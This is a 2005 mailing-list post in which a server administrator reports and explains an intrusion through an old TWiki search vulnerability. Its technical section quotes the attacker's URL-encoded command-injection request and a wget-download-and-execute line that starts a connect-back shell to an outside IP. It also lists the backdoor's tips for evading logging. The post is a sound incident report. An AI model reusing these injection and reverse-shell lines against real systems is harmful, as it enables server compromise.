Joel Uckelman on Thu, 31 Mar 2005 01:11:52 -0600 (CST)


[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

[hosers-announce] Hacked!


On 28 March, someone used an old TWiki vulnerability to gain shell access 
on charybdis. Fortunately, it appears that I caught the intruder prior to 
his doing anything with the shells he opened: chrootkit detects nothing 
amiss, nor are there any oddities in the logs or with process accounting, 
and the shells were open under the apache user, so I think things are ok 
now.

However:

Please, please, PLEASE, if you have any software set up in your web space, 
KEEP IT UP TO DATE!!! If you can't do that, THEN DON'T KEEP SET UP, because 
it endangers the whole server. I can't stress enough how important this is. 
Anyone who is running something (like TWiki) from your web space, please 
let me know what you're running; that way I can help you keep up with 
security issues.


Those of you who don't care about the technical details can stop reading 
here. Here's how I discovered the problem, for anyone interested:

I noticed that logging in was about a half-second slower than usual, and so 
checked the load average. Seeing that the 15-minute average was over 4 
tipped me off that something was wrong. My first thought was that there 
must be a runaway process. So I checked, and ps told me this:

apache   28240  0.0  0.2  2736  892 ?        S    Mar28   0:00 sh -c 
/bin/fgrep
-i -l -- 'doesnotexist1'; (cd /tmp; wget http://www.geocities.com/idiotr0x/d
c.bin; chmod +x dc.bin; ./dc.bin 66.179.61.159 6545) | sed 
's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2' *.txt
apache   28244  0.0  0.0  3268  336 ?        S    Mar28   0:00 sed 
s/\(.*\)/__BEGIN__\1__END__.txt/
apache   28246 24.2  0.0  1388  184 ?        R    Mar28 942:08 ./dc.bin 
66.179.61.159 6545

That made it plain that someone was taking advantage of an exploit, since 
apache should not be doing such things.

A look in the logs showed me how the guy got in:

199.203.54.66 - - [28/Mar/2005:07:03:41 -0600] "GET 
/~dwhytock/cgi-bin/twiki/search/IMT/?scope=text&search=doesnotexist1%27%3B+%
28cd+%2Ftmp%3B+wget+http%3A%2F%2Fwww.geocities.com%2Fidiotr0x%2Fdc.bin%3B+ch
mod+%2Bx+dc.bin%3B+.%2Fdc.bin+66.179.61.159+6545%29+%7C+sed+%27s%2F%5C%28.*%
5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 
HTTP/1.1" 200 2089 "http://www.nomic.net/~dwhytock/cgi-bin/twiki/view/IMT/We
bSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

And running strings on dc.bin gave me the following (among other things):

Welcome to Data Cha0s Connect Back Shell
Issue "export TERM=xterm; exec bash -i"
For More Reliable Shell.
Issue "unset HISTFILE; unset SAVEHIST"
For Not Getting Logged.
Data Cha0s Connect Back Backdoor
Usage: %s [Host] <port>

Yeah. So, either this guy is (1) a moron, since he didn't cover his tracks 
at all, or (2) wicked clever, since he covered his tracks so well as to 
fool chkrootkit and made everything look as though some moron broke in.

Fun, fun.
-- 
J.


_______________________________________________
hosers-announce mailing list
hosers-announce@xxxxxxxxxxx
http://lists.ellipsis.cx/mailman/listinfo/hosers-announce